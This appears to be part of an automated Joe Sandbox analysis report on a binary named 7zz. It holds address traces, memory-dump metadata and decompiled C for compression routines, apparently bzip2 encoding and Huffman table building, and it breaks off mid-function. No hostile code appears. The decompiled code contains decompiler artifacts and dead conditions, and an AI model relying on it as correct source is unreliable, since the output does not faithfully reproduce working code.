                                                                                  0x0044e7d9
                                                                                  0x0044e5c2
                                                                                  0x0044e5c2
                                                                                  0x0044e5ca
                                                                                  0x0044e5cf
                                                                                  0x0044e5d9
                                                                                  0x0044e5e0
                                                                                  0x0044e5e4
                                                                                  0x0044e5e9
                                                                                  0x0044e5ed
                                                                                  0x0044e5f3
                                                                                  0x0044e5f6
                                                                                  0x0044e5fb
                                                                                  0x0044e5fe
                                                                                  0x0044e8ed
                                                                                  0x0044e8ef
                                                                                  0x0044e8f7
                                                                                  0x0044e8fc
                                                                                  0x0044e604
                                                                                  0x0044e60a
                                                                                  0x0044e60d
                                                                                  0x0044e615
                                                                                  0x0044e619
                                                                                  0x0044e61e
                                                                                  0x0044e621
                                                                                  0x00000000
                                                                                  0x0044e627
                                                                                  0x0044e62d
                                                                                  0x0044e62f
                                                                                  0x0044e632
                                                                                  0x0044e634
                                                                                  0x0044e637
                                                                                  0x0044e639
                                                                                  0x0044e641
                                                                                  0x0044e646
                                                                                  0x0044e64b
                                                                                  0x0044e64d
                                                                                  0x0044e652
                                                                                  0x0044e657
                                                                                  0x0044e657
                                                                                  0x0044e658
                                                                                  0x0044e658
                                                                                  0x0044e65f
                                                                                  0x0044e676
                                                                                  0x0044e689
                                                                                  0x0044e68c
                                                                                  0x0044e68f
                                                                                  0x0044e692
                                                                                  0x0044e692
                                                                                  0x0044e639
                                                                                  0x0044e696
                                                                                  0x0044e6a6
                                                                                  0x0044e6ab
                                                                                  0x0044e6ae
                                                                                  0x0044e6ae
                                                                                  0x0044e6ae
                                                                                  0x0044e6b6
                                                                                  0x0044e6b8
                                                                                  0x0044e6bc
                                                                                  0x0044e711
                                                                                  0x0044e711
                                                                                  0x0044e713
                                                                                  0x0044e719
                                                                                  0x0044e71c
                                                                                  0x0044e722
                                                                                  0x0044e728
                                                                                  0x0044e729
                                                                                  0x0044e72b
                                                                                  0x0044e73f
                                                                                  0x0044e744
                                                                                  0x0044e746
                                                                                  0x0044e770
                                                                                  0x0044e770
                                                                                  0x0044e773
                                                                                  0x0044e775
                                                                                  0x0044e775
                                                                                  0x0044e775
                                                                                  0x0044e77f
                                                                                  0x0044e788
                                                                                  0x0044e789
                                                                                  0x0044e78a
                                                                                  0x0044e78c
                                                                                  0x0044e78f
                                                                                  0x0044e793
                                                                                  0x0044e793
                                                                                  0x0044e79c
                                                                                  0x0044e79c
                                                                                  0x0044e79d
                                                                                  0x0044e748
                                                                                  0x0044e74d
                                                                                  0x0044e74f
                                                                                  0x0044e770
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044e751
                                                                                  0x0044e751
                                                                                  0x0044e753
                                                                                  0x0044e755
                                                                                  0x0044e757
                                                                                  0x0044e757
                                                                                  0x0044e759
                                                                                  0x0044e75c
                                                                                  0x0044e75f
                                                                                  0x0044e765
                                                                                  0x0044e766
                                                                                  0x0044e767
                                                                                  0x0044e767
                                                                                  0x0044e768
                                                                                  0x0044e768
                                                                                  0x0044e76e
                                                                                  0x0044e74f
                                                                                  0x0044e7a3
                                                                                  0x0044e72d
                                                                                  0x0044e730
                                                                                  0x0044e732
                                                                                  0x0044e734
                                                                                  0x0044e737
                                                                                  0x0044e73b
                                                                                  0x0044e73d
                                                                                  0x0044e73d
                                                                                  0x00000000
                                                                                  0x0044e73d
                                                                                  0x0044e73b
                                                                                  0x0044e732
                                                                                  0x0044e72b
                                                                                  0x0044e6be
                                                                                  0x0044e6be
                                                                                  0x00000000
                                                                                  0x0044e6c0
                                                                                  0x0044e6c0
                                                                                  0x0044e6c4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044e6c6
                                                                                  0x0044e6c6
                                                                                  0x0044e6c6
                                                                                  0x0044e6c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044e6d3
                                                                                  0x0044e6dd
                                                                                  0x0044e6e0
                                                                                  0x0044e6e3
                                                                                  0x0044e6e5
                                                                                  0x0044e6e9
                                                                                  0x0044e6e9
                                                                                  0x0044e6f2
                                                                                  0x0044e6f6
                                                                                  0x0044e6f9
                                                                                  0x0044e6fc
                                                                                  0x0044e6fd
                                                                                  0x0044e6ff
                                                                                  0x0044e703
                                                                                  0x0044e707
                                                                                  0x00000000
                                                                                  0x0044e709
                                                                                  0x0044e709
                                                                                  0x00000000
                                                                                  0x0044e70b
                                                                                  0x0044e70b
                                                                                  0x0044e70f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044e70f
                                                                                  0x0044e709
                                                                                  0x00000000
                                                                                  0x0044e707
                                                                                  0x0044e6c6
                                                                                  0x0044e6c4
                                                                                  0x0044e6be
                                                                                  0x0044e7a7
                                                                                  0x0044e7ab
                                                                                  0x0044e7af
                                                                                  0x0044e7b1
                                                                                  0x0044e7b4
                                                                                  0x00000000
                                                                                  0x0044e7b8
                                                                                  0x0044e621
                                                                                  0x0044e5fe
                                                                                  0x0044e544
                                                                                  0x0044e54b
                                                                                  0x0044e54d
                                                                                  0x00000000
                                                                                  0x0044e54f
                                                                                  0x0044e562
                                                                                  0x0044e56b
                                                                                  0x0044e572
                                                                                  0x0044e57d
                                                                                  0x0044e585
                                                                                  0x0044e588
                                                                                  0x0044e593
                                                                                  0x0044e595
                                                                                  0x0044e597
                                                                                  0x0044e8dc
                                                                                  0x0044e8e4
                                                                                  0x0044e8e9
                                                                                  0x0044e59d
                                                                                  0x0044e59d
                                                                                  0x00000000
                                                                                  0x0044e59d
                                                                                  0x0044e597
                                                                                  0x0044e54d
                                                                                  0x0044e532
                                                                                  0x0044e532
                                                                                  0x0044e536
                                                                                  0x00000000
                                                                                  0x0044e53c
                                                                                  0x0044e53c
                                                                                  0x00000000
                                                                                  0x0044e892
                                                                                  0x0044e896
                                                                                  0x0044e89a
                                                                                  0x0044e89a
                                                                                  0x0044e8a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044e8a4
                                                                                  0x0044e8a4
                                                                                  0x0044e8a4
                                                                                  0x0044e53c
                                                                                  0x00000000
                                                                                  0x0044e536
                                                                                  0x0044e530
                                                                                  0x0044e503
                                                                                  0x0044e505
                                                                                  0x0044e50d
                                                                                  0x0044e512
                                                                                  0x0044e512
                                                                                  0x0044e497
                                                                                  0x0044e497
                                                                                  0x0044e497
                                                                                  0x0044e483
                                                                                  0x0044e483
                                                                                  0x0044e483
                                                                                  0x0044e465
                                                                                  0x0044e465
                                                                                  0x0044e465
                                                                                  0x0044e91d
                                                                                  0x0044e925
                                                                                  0x0044e92f

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bdb79ba1893ab33bcd4eb932cbc06b661e8d4d2b215cf5133c1798053672a223
                                                                                  • Instruction ID: 149f3ba7fcc7b310817431056b7830669582af05e2817226ce6dbfe3fe10b790
                                                                                  • Opcode Fuzzy Hash: bdb79ba1893ab33bcd4eb932cbc06b661e8d4d2b215cf5133c1798053672a223
                                                                                  • Instruction Fuzzy Hash: 33F1B3706047428FEB14DF2AC59062AF7E1FF89314F544A2EE4E687781D738E945CB49
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00451050 Relevance: .4, Instructions: 373COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 69%
                                                                                  			E00451050(void* __ecx) {
				intOrPtr _t134;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				void* _t143;
				void* _t145;
				void* _t147;
				void* _t149;
				signed int _t163;
				intOrPtr* _t182;
				unsigned int _t185;
				intOrPtr* _t189;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t213;
				int _t223;
				void* _t241;
				unsigned int _t244;
				intOrPtr _t246;
				signed int _t247;
				unsigned int _t250;
				unsigned int _t251;
				signed int _t252;
				signed char _t263;
				intOrPtr _t273;
				intOrPtr* _t276;
				intOrPtr* _t281;
				int _t282;
				intOrPtr _t283;
				signed int _t294;
				void* _t301;
				unsigned int _t306;
				void* _t307;
				signed char _t310;
				intOrPtr* _t312;
				void* _t313;
				void* _t316;
				signed int _t318;
				void* _t319;
				intOrPtr* _t320;
				void* _t321;

				_t319 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1cc0)) != 0) {
					_t201 =  *((intOrPtr*)(__ecx + 8));
					_t276 = __ecx + 8;
					if(_t201 <  *((intOrPtr*)(__ecx + 0xc))) {
						 *_t276 = _t201 + 1;
					} else {
						E0040E070(_t276);
					}
				}
				_t312 = _t319 + 8;
				if( *(_t319 + 0x2c) >= 0x10) {
					do {
						_t189 =  *_t312;
						if(_t189 <  *((intOrPtr*)(_t312 + 4))) {
							 *(_t321 + 0x10) =  *_t189;
							 *_t312 = _t189 + 1;
						} else {
							 *(_t321 + 0x10) = E0040E070(_t312);
						}
						_t191 =  *_t312;
						if(_t191 <  *((intOrPtr*)(_t312 + 4))) {
							 *(_t321 + 0x14) =  *_t191;
							 *_t312 = _t191 + 1;
						} else {
							 *(_t321 + 0x14) = E0040E070(_t312);
						}
						_t273 =  *((intOrPtr*)(_t312 + 0x24)) + 0xfffffff0;
						 *((intOrPtr*)(_t312 + 0x24)) = _t273;
						 *(_t312 + 0x20) = ( *(_t312 + 0x20) << 0x00000008 |  *(_t321 + 0x14) & 0x000000ff) << 0x00000008 |  *(_t321 + 0x10) & 0x000000ff;
					} while (_t273 >= 0x10);
				}
				_t294 = E00450B20(3);
				 *(_t321 + 0x10) = _t294;
				if(_t294 <= 3) {
					if( *((intOrPtr*)(_t319 + 0x1cc1)) == 0) {
						_t134 =  *((intOrPtr*)(_t312 + 0x24));
						 *((intOrPtr*)(_t312 + 0x24)) = _t134 + 0xc;
						E00450FC0(_t312);
						_t137 =  *((intOrPtr*)(_t312 + 0x24));
						 *((intOrPtr*)(_t312 + 0x24)) = _t137 + 0xc;
						_t139 = E00450FC0(_t312);
						 *(_t319 + 0x1cb4) = (( *(_t312 + 0x20) >> 0x0000000f - _t134 >> 0x00000005 & 0x00000fff) << 0xc) + ( *(_t312 + 0x20) >> 0x0000000f - _t137 >> 0x00000005 & 0x00000fff);
						_t294 =  *(_t321 + 0x10);
					} else {
						_t139 = E00450B20(1);
						if(_t139 != 1) {
							_t139 = E00450B20(0x10);
							 *(_t319 + 0x1cb4) = _t139;
						} else {
							 *(_t319 + 0x1cb4) = 0x8000;
						}
					}
					_t140 = _t139 & 0xffffff00 | _t294 == 0x00000003;
					 *(_t319 + 0x68) = _t140;
					if(_t140 == 0 || ( *(_t319 + 0x1cb4) & 0x00000001) == 0) {
						_t223 = 0;
					} else {
						_t223 = 1;
					}
					 *(_t319 + 0x1cc0) = _t223;
					if(_t140 == 0) {
						_t141 = _t140 & 0xffffff00 | _t294 == 0x00000002;
						 *(_t319 + 0x69) = _t141;
						if(_t141 == 0) {
							L52:
							_push(0x100);
							_push(_t321 + 0xa4);
							_push(_t319 + 0x1920);
							_t143 = E00450BD0(_t319);
							if(_t143 != 0) {
								_push( *((intOrPtr*)(_t319 + 0x64)));
								_push(_t321 + 0x1a4);
								_push(_t319 + 0x1a20);
								_t145 = E00450BD0(_t319);
								if(_t145 != 0) {
									_t147 =  *((intOrPtr*)(_t319 + 0x64)) + 0x100;
									if(_t147 < 0x290) {
										_t301 = _t321 + _t147 + 0xa4;
										memset(_t301 + (0x290 - _t147 >> 2), memset(_t301, 0, 0x290 << 2), 0 << 0);
										_t321 = _t321 + 0x18;
									}
									_push(_t321 + 0xa4);
									_t149 = E00451F90(_t319 + 0x6c);
									if(_t149 != 0) {
										_push(0xf9);
										_push(_t321 + 0xa4);
										_push(_t319 + 0x1bb0);
										if(E00450BD0(_t319) != 0) {
											_push(_t321 + 0xa4);
											return E004520E0(_t319 + 0xd34);
										} else {
											goto L61;
										}
									} else {
										return _t149;
									}
								} else {
									return _t145;
								}
							} else {
								return _t143;
							}
						} else {
							_t313 = 0;
							do {
								 *((char*)(_t321 + _t313 + 0xa4)) = E00450B20(3);
								_t313 = _t313 + 1;
							} while (_t313 < 8);
							_t281 = _t319 + 0x1428;
							memset(_t321 + 0x20, 0, 0x10 << 2);
							_t321 = _t321 + 0xc;
							_t306 = 0;
							_t241 = 0;
							while(0 <= 0x10) {
								 *_t281 = 0xffffffff;
								_t241 = _t241 + 1;
								_t281 = _t281 + 4;
								 *((intOrPtr*)(_t321 + 0x1c)) =  *((intOrPtr*)(_t321 + 0x1c)) + 1;
								if(_t241 < 8) {
									continue;
								} else {
									_t163 = 0;
									 *(_t321 + 0x1c) = _t306;
									 *(_t319 + 0x13a0) = _t306;
									 *(_t319 + 0x13e4) = _t306;
									 *(_t321 + 0x10) = 0;
									_t282 = 1;
									while(1) {
										_t316 = _t321 + 0x1c + _t282 * 4;
										_t306 = _t306 + ( *(_t321 + 0x1c + _t282 * 4) << 0x10 - _t282);
										 *(_t321 + 0x18) = _t306;
										if(_t306 > 0x10000) {
											goto L61;
										}
										_t244 = 0x10000;
										if(_t282 != 0x10) {
											_t244 = _t306;
										}
										 *(_t319 + 0x13a0 + _t282 * 4) = _t244;
										_t246 =  *((intOrPtr*)(_t319 + 0x13e0 + _t282 * 4)) +  *((intOrPtr*)(_t316 - 4));
										 *((intOrPtr*)(_t319 + 0x13e4 + _t282 * 4)) = _t246;
										 *((intOrPtr*)(_t321 + 0x60 + _t282 * 4)) = _t246;
										if(_t282 <= 9) {
											_t250 =  *(_t319 + 0x13a0 + _t282 * 4) >> 7;
											if(_t163 < _t250) {
												_t96 = _t319 + 0x1448; // 0x1448
												_t307 = _t163 + _t96;
												_t251 = _t250 - _t163;
												 *(_t321 + 0x14) = _t251;
												_t318 = _t251;
												_t252 = _t251 >> 2;
												memset(_t307 + _t252, memset(_t307, _t282, _t252 << 2), (_t318 & 0x00000003) << 0);
												_t321 = _t321 + 0x18;
												_t306 =  *(_t321 + 0x18);
												_t163 =  *(_t321 + 0x10) + _t318;
												 *(_t321 + 0x10) = _t163;
											}
										}
										_t282 = _t282 + 1;
										if(_t282 <= 0x10) {
											continue;
										} else {
											_t283 = 0;
											do {
												if(0 != 0) {
													_t247 =  *(_t321 + 0x60);
													 *((intOrPtr*)(_t319 + 0x1428 + _t247 * 4)) = _t283;
													 *(_t321 + 0x60) = _t247 + 1;
												}
												_t283 = _t283 + 1;
											} while (_t283 < 8);
											goto L52;
										}
										goto L63;
									}
									goto L61;
								}
								goto L63;
							}
							goto L61;
						}
					} else {
						E00450B20(0x10 - ( *(_t319 + 0x2c) & 0x0000000f));
						if( *((intOrPtr*)(_t312 + 0x24)) != 0) {
							L61:
							return 0;
						} else {
							 *(_t321 + 0x14) = 2;
							 *(_t319 + 0x58) =  *(_t312 + 0x20) >> 0x00000010 |  *(_t312 + 0x20) << 0x00000010;
							 *((intOrPtr*)(_t312 + 0x24)) = 0x20;
							 *(_t319 + 0x58) =  *(_t319 + 0x58) - 1;
							_t320 = _t319 + 0x5c;
							do {
								_t213 = 0;
								_t310 = 0;
								do {
									_t182 =  *_t312;
									if(_t182 <  *((intOrPtr*)(_t312 + 4))) {
										 *(_t321 + 0x10) =  *_t182;
										 *_t312 = _t182 + 1;
									} else {
										 *(_t321 + 0x10) = E0040E070(_t312);
									}
									_t263 = _t310;
									_t310 = _t310 + 8;
									_t213 = _t213 | ( *(_t321 + 0x10) & 0x000000ff) << _t263;
								} while (_t310 < 0x20);
								 *_t320 = _t213 - 1;
								_t320 = _t320 + 4;
								_t185 =  *(_t321 + 0x14) - 1;
								 *(_t321 + 0x14) = _t185;
							} while (_t185 != 0);
							return 1;
						}
					}
				} else {
					return 0;
				}
				L63:
			}













































                                                                                  0x00451058
                                                                                  0x00451064
                                                                                  0x00451066
                                                                                  0x0045106c
                                                                                  0x00451071
                                                                                  0x0045107b
                                                                                  0x00451073
                                                                                  0x00451073
                                                                                  0x00451073
                                                                                  0x00451071
                                                                                  0x00451080
                                                                                  0x0045108a
                                                                                  0x00451091
                                                                                  0x00451091
                                                                                  0x00451098
                                                                                  0x004510aa
                                                                                  0x004510ae
                                                                                  0x0045109a
                                                                                  0x004510a1
                                                                                  0x004510a1
                                                                                  0x004510b0
                                                                                  0x004510b7
                                                                                  0x004510c9
                                                                                  0x004510cd
                                                                                  0x004510b9
                                                                                  0x004510c0
                                                                                  0x004510c0
                                                                                  0x004510f1
                                                                                  0x004510f5
                                                                                  0x004510f8
                                                                                  0x004510fd
                                                                                  0x00451091
                                                                                  0x0045110a
                                                                                  0x0045110f
                                                                                  0x00451113
                                                                                  0x0045112a
                                                                                  0x00451156
                                                                                  0x0045116a
                                                                                  0x00451176
                                                                                  0x0045117b
                                                                                  0x0045118f
                                                                                  0x0045119b
                                                                                  0x004511a5
                                                                                  0x004511ab
                                                                                  0x0045112c
                                                                                  0x00451130
                                                                                  0x00451138
                                                                                  0x00451149
                                                                                  0x0045114e
                                                                                  0x0045113a
                                                                                  0x0045113a
                                                                                  0x0045113a
                                                                                  0x00451138
                                                                                  0x004511b2
                                                                                  0x004511b7
                                                                                  0x004511ba
                                                                                  0x004511cc
                                                                                  0x004511c5
                                                                                  0x004511c5
                                                                                  0x004511c5
                                                                                  0x004511d0
                                                                                  0x004511d6
                                                                                  0x00451282
                                                                                  0x00451287
                                                                                  0x0045128a
                                                                                  0x004513d0
                                                                                  0x004513d7
                                                                                  0x004513e2
                                                                                  0x004513e3
                                                                                  0x004513e6
                                                                                  0x004513ed
                                                                                  0x00451404
                                                                                  0x0045140b
                                                                                  0x0045140c
                                                                                  0x0045140f
                                                                                  0x00451416
                                                                                  0x00451426
                                                                                  0x00451430
                                                                                  0x00451437
                                                                                  0x0045144e
                                                                                  0x0045144e
                                                                                  0x0045144e
                                                                                  0x0045145a
                                                                                  0x0045145b
                                                                                  0x00451462
                                                                                  0x00451476
                                                                                  0x00451481
                                                                                  0x00451482
                                                                                  0x0045148c
                                                                                  0x004514a8
                                                                                  0x004514b8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0045146e
                                                                                  0x0045146e
                                                                                  0x0045146e
                                                                                  0x00451422
                                                                                  0x00451422
                                                                                  0x00451422
                                                                                  0x004513f9
                                                                                  0x004513f9
                                                                                  0x004513f9
                                                                                  0x00451290
                                                                                  0x00451290
                                                                                  0x00451292
                                                                                  0x0045129b
                                                                                  0x004512a2
                                                                                  0x004512a3
                                                                                  0x004512b3
                                                                                  0x004512b9
                                                                                  0x004512b9
                                                                                  0x004512bb
                                                                                  0x004512bd
                                                                                  0x004512bf
                                                                                  0x004512da
                                                                                  0x004512e0
                                                                                  0x004512e1
                                                                                  0x004512e7
                                                                                  0x004512e9
                                                                                  0x00000000
                                                                                  0x004512eb
                                                                                  0x004512eb
                                                                                  0x004512ed
                                                                                  0x004512f1
                                                                                  0x004512f7
                                                                                  0x004512fd
                                                                                  0x00451301
                                                                                  0x00451306
                                                                                  0x0045130a
                                                                                  0x00451317
                                                                                  0x0045131f
                                                                                  0x00451323
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0045132c
                                                                                  0x00451331
                                                                                  0x00451333
                                                                                  0x00451333
                                                                                  0x00451338
                                                                                  0x00451346
                                                                                  0x0045134b
                                                                                  0x00451352
                                                                                  0x00451356
                                                                                  0x0045135f
                                                                                  0x00451364
                                                                                  0x00451366
                                                                                  0x00451366
                                                                                  0x0045136d
                                                                                  0x00451371
                                                                                  0x00451377
                                                                                  0x00451383
                                                                                  0x0045138d
                                                                                  0x0045138d
                                                                                  0x00451393
                                                                                  0x00451399
                                                                                  0x0045139b
                                                                                  0x0045139b
                                                                                  0x00451364
                                                                                  0x0045139f
                                                                                  0x004513a3
                                                                                  0x00000000
                                                                                  0x004513a9
                                                                                  0x004513a9
                                                                                  0x004513ab
                                                                                  0x004513b6
                                                                                  0x004513b8
                                                                                  0x004513c0
                                                                                  0x004513c8
                                                                                  0x004513c8
                                                                                  0x004513ca
                                                                                  0x004513cb
                                                                                  0x00000000
                                                                                  0x004513ab
                                                                                  0x00000000
                                                                                  0x004513a3
                                                                                  0x00000000
                                                                                  0x00451306
                                                                                  0x00000000
                                                                                  0x004512e9
                                                                                  0x00000000
                                                                                  0x004512bf
                                                                                  0x004511dc
                                                                                  0x004511ec
                                                                                  0x004511f6
                                                                                  0x00451491
                                                                                  0x0045149a
                                                                                  0x004511fc
                                                                                  0x004511ff
                                                                                  0x00451211
                                                                                  0x00451214
                                                                                  0x0045121f
                                                                                  0x00451222
                                                                                  0x00451225
                                                                                  0x00451225
                                                                                  0x00451227
                                                                                  0x00451229
                                                                                  0x00451229
                                                                                  0x00451230
                                                                                  0x00451242
                                                                                  0x00451246
                                                                                  0x00451232
                                                                                  0x00451239
                                                                                  0x00451239
                                                                                  0x0045124c
                                                                                  0x00451254
                                                                                  0x00451259
                                                                                  0x0045125b
                                                                                  0x00451265
                                                                                  0x00451268
                                                                                  0x0045126b
                                                                                  0x0045126c
                                                                                  0x0045126c
                                                                                  0x0045127e
                                                                                  0x0045127e
                                                                                  0x004511f6
                                                                                  0x00451118
                                                                                  0x00451121
                                                                                  0x00451121
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5a7e5d09e26d5753100cc2568189196292b632a231a3296cbee244cacba0436a
                                                                                  • Instruction ID: 7ffc51f0b6ed8d7e1b84f6e78e82dd49a9c305e9cdf2e8039c63d13bff25686b
                                                                                  • Opcode Fuzzy Hash: 5a7e5d09e26d5753100cc2568189196292b632a231a3296cbee244cacba0436a
                                                                                  • Instruction Fuzzy Hash: 45D1F1327043454FDB28CE68D8907EEB7D2ABC9305F44093EED8AC7782D678A949C795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00449460 Relevance: .3, Instructions: 343COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 96%
                                                                                  			E00449460(intOrPtr __ecx) {
				signed char _t107;
				signed char _t110;
				signed char _t133;
				signed char _t134;
				signed int _t137;
				signed int _t139;
				signed char _t141;
				signed char _t143;
				signed char _t148;
				signed char _t149;
				signed char _t158;
				signed char _t160;
				signed char _t169;
				signed char _t170;
				signed char _t185;
				signed char _t186;
				signed char _t189;
				signed char _t219;
				intOrPtr _t251;
				intOrPtr _t257;
				intOrPtr* _t264;
				signed char _t265;
				void* _t267;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed char _t274;
				void* _t275;
				void* _t276;
				signed char _t277;
				void* _t278;
				intOrPtr _t279;
				void* _t280;

				_push(0xffffffff);
				_push(E00479538);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t279;
				_t280 = _t279 - 0x10;
				_t269 = __ecx;
				 *((intOrPtr*)(__ecx + 0x1b0)) =  *((intOrPtr*)(_t279 + 0x20));
				_t107 = E004481D0(__ecx);
				if(_t107 == 0) {
					_t185 = 0;
					if( *((intOrPtr*)(__ecx + 0x198)) <= 0) {
						L9:
						_t273 = _t269 + 0x20;
						if(E0040DF95(_t273, 0x20000) != 0) {
							_t264 = _t269 + 0x140;
							_t110 = L0040EE76(_t264, 0x20000);
							__eflags = _t110;
							if(_t110 != 0) {
								_t251 =  *((intOrPtr*)(_t280 + 0x30));
								E0040DFE4(_t273, _t251);
								E0040DFF3(_t273);
								L0040EEC1(_t264,  *((intOrPtr*)(_t280 + 0x34)));
								L0040EED0(_t264);
								 *(_t264 + 0x28) = 8;
								 *(_t264 + 0x2c) = 0;
								 *((intOrPtr*)(_t280 + 0x30)) = _t269;
								_t186 = 0;
								 *((intOrPtr*)(_t280 + 0x28)) = 0;
								 *((intOrPtr*)(_t269 + 0x174)) = 0;
								 *((intOrPtr*)(_t269 + 0x1a0)) = 0;
								 *((char*)(_t269 + 0x1a5)) = 0;
								 *((char*)(_t269 + 0x1a4)) = 0;
								L00467B30(_t269 + 0x1a8);
								E004486E0(0x42);
								E004486E0(0x5a);
								E004486E0(0x68);
								E004486E0( *((intOrPtr*)(_t269 + 0x10)) + 0x30);
								__eflags =  *(_t269 + 0x19c);
								if( *(_t269 + 0x19c) == 0) {
									_t187 =  *((intOrPtr*)(_t269 + 0x178));
									__eflags = E00448490(_t269,  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x178)))));
									if(__eflags == 0) {
										L31:
										_t186 = 0;
										__eflags = 0;
										goto L32;
									} else {
										while(1) {
											_t189 = E00449200(_t187, __eflags, _t123);
											__eflags = _t189;
											if(_t189 != 0) {
												break;
											}
											__eflags =  *(_t280 + 0x40);
											if( *(_t280 + 0x40) == 0) {
												L30:
												_t187 =  *((intOrPtr*)(_t269 + 0x178));
												_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x178))));
												__eflags = E00448490(_t269, _t251);
												if(__eflags != 0) {
													continue;
												} else {
													goto L31;
												}
											} else {
												asm("cdq");
												asm("adc edx, ecx");
												 *((intOrPtr*)(_t280 + 0x18)) =  *_t273 -  *((intOrPtr*)(_t273 + 8)) +  *((intOrPtr*)(_t273 + 0x10));
												 *((intOrPtr*)(_t280 + 0x1c)) = _t251;
												 *((intOrPtr*)(_t280 + 0x10)) = L0040EEE8(_t264) + (0xf -  *(_t264 + 0x28) >> 3);
												_t158 =  *(_t280 + 0x40);
												asm("adc edx, ebx");
												 *((intOrPtr*)(_t280 + 0x18)) = _t251;
												_t189 =  *((intOrPtr*)( *_t158 + 0xc))(_t158, _t280 + 0x1c, _t280 + 0x10);
												__eflags = _t189;
												if(_t189 != 0) {
													_t160 =  *(_t269 + 0x2c);
													 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
													__eflags = _t160;
													if(_t160 != 0) {
														 *((intOrPtr*)( *_t160 + 8))(_t160);
														 *(_t269 + 0x2c) = 0;
													}
													_t149 =  *(_t269 + 0x154);
													__eflags = _t149;
													if(_t149 != 0) {
														L53:
														 *((intOrPtr*)( *_t149 + 8))(_t149);
														 *(_t269 + 0x154) = 0;
													}
													L54:
													_t107 = _t189;
												} else {
													goto L30;
												}
											}
											goto L55;
										}
										_t148 =  *(_t269 + 0x2c);
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										__eflags = _t148;
										if(_t148 != 0) {
											 *((intOrPtr*)( *_t148 + 8))(_t148);
											 *(_t269 + 0x2c) = 0;
										}
										_t149 =  *(_t269 + 0x154);
										__eflags = _t149;
										if(_t149 != 0) {
											goto L53;
										}
										goto L54;
									}
								} else {
									L00467B10( *((intOrPtr*)(_t269 + 0x178)) + 0x8cf0);
									 *(_t269 + 0x1ac) = 0;
									L00467B10(_t269 + 0x17c);
									_t275 = 0;
									__eflags =  *(_t269 + 0x198);
									if( *(_t269 + 0x198) > 0) {
										do {
											L00467AC0( *((intOrPtr*)(_t186 +  *((intOrPtr*)(_t269 + 0x178)) + 0x8ce8)));
											_t275 = _t275 + 1;
											_t186 = _t186 + 0x8e00;
											__eflags = _t275 -  *(_t269 + 0x198);
										} while (_t275 <  *(_t269 + 0x198));
										_t186 = 0;
										__eflags = 0;
									}
									L00467B30(_t269 + 0x17c);
									L00467B10(_t269 + 0x1a8);
									_t276 = 0;
									__eflags =  *(_t269 + 0x198) - _t186;
									if( *(_t269 + 0x198) > _t186) {
										do {
